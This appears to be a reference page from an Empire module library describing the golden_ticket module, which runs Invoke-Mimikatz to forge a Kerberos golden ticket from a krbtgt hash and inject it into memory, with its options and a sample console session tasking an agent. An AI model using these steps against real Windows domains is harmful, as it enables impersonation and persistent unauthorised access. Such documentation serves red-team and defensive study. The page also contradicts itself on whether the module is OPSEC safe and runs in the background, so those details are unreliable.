Invoke-Mimikatz Golden Ticket - Empire Module


This page contains detailed information about how to use the powershell/credentials/mimikatz/golden_ticket Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-Mimikatz Golden Ticket
Module: powershell/credentials/mimikatz/golden_ticket
Source code [1]: empire/server/modules/powershell/credentials/mimikatz/golden_ticket.yaml
Source code [2]: empire/server/modules/powershell/credentials/mimikatz/golden_ticket.py
MITRE ATT&CK: T1098, T1003, T1081, T1207, T1075, T1097, T1145, T1101, T1178, S0002
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: Yes

The golden_ticket module runs PowerSploit's Invoke-Mimikatz function to generate a golden ticket and inject it into memory.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the golden_ticket module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the golden_ticket module:

Agent
Agent to run module on.

CredID
CredID from the store to use for ticket creation.

user
Username to impersonate.

Additional Module Options


This is a list of additional options that are supported by the golden_ticket module:

domain
The fully qualified domain name.

endin
Lifetime of the ticket (in minutes). Default to 10 years.

groups
Optional comma separated group IDs for the ticket.

id
id to impersonate, defaults to 500.

krbtgt
krbtgt NTLM hash for the specified domain.

sid
The SID of the specified domain.

sids
External SIDs to add as sidhistory to the ticket.

Golden_ticket Example Usage


Here's an example of how to use the golden_ticket module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/credentials/mimikatz/golden_ticket

 Author       @JosephBialek                                                    
              @gentilkiwi                                                      
 Background   True                                                             
 Comments     http://clymb3r.wordpress.com/                                    
              http://blog.gentilkiwi.com                                       
              https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos    
 Description  Runs PowerSploit's Invoke-Mimikatz function to generate a golden 
              ticket and inject it into memory.                                
 Language     powershell                                                       
 Name         powershell/credentials/mimikatz/golden_ticket                    
 NeedsAdmin   False                                                            
 OpsecSafe    True                                                             
 Software     http://attack.mitre.org/software/S0002                           
 Techniques   http://attack.mitre.org/techniques/T1098                         
              http://attack.mitre.org/techniques/T1003                         
              http://attack.mitre.org/techniques/T1081                         
              http://attack.mitre.org/techniques/T1207                         
              http://attack.mitre.org/techniques/T1075                         
              http://attack.mitre.org/techniques/T1097                         
              http://attack.mitre.org/techniques/T1145                         
              http://attack.mitre.org/techniques/T1101                         
              http://attack.mitre.org/techniques/T1178                         


,Record Options--,----------,-------------------------------------,
| Name   | Value | Required | Description                         |
|--------|-------|----------|-------------------------------------|
| Agent  |       | True     | Agent to run module on.             |
|--------|-------|----------|-------------------------------------|
| CredID |       | True     | CredID from the store to use for    |
|        |       |          | ticket creation.                    |
|--------|-------|----------|-------------------------------------|
| domain |       | False    | The fully qualified domain name.    |
|--------|-------|----------|-------------------------------------|
| endin  |       | False    | Lifetime of the ticket (in          |
|        |       |          | minutes). Default to 10 years.      |
|--------|-------|----------|-------------------------------------|
| groups |       | False    | Optional comma separated group IDs  |
|        |       |          | for the ticket.                     |
|--------|-------|----------|-------------------------------------|
| id     |       | False    | id to impersonate, defaults to 500. |
|--------|-------|----------|-------------------------------------|
| krbtgt |       | False    | krbtgt NTLM hash for the specified  |
|        |       |          | domain                              |
|--------|-------|----------|-------------------------------------|
| sid    |       | False    | The SID of the specified domain.    |
|--------|-------|----------|-------------------------------------|
| sids   |       | False    | External SIDs to add as sidhistory  |
|        |       |          | to the ticket.                      |
|--------|-------|----------|-------------------------------------|
| user   |       | True     | Username to impersonate.            |
'--------'-------'----------'-------------------------------------'

(Empire: usemodule/powershell/credentials/mimikatz/golden_ticket) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/credentials/mimikatz/golden_ticket) > set CredID value
[*] Set CredID to value
(Empire: usemodule/powershell/credentials/mimikatz/golden_ticket) > set user user
[*] Set user to user
(Empire: usemodule/powershell/credentials/mimikatz/golden_ticket) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Authors


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.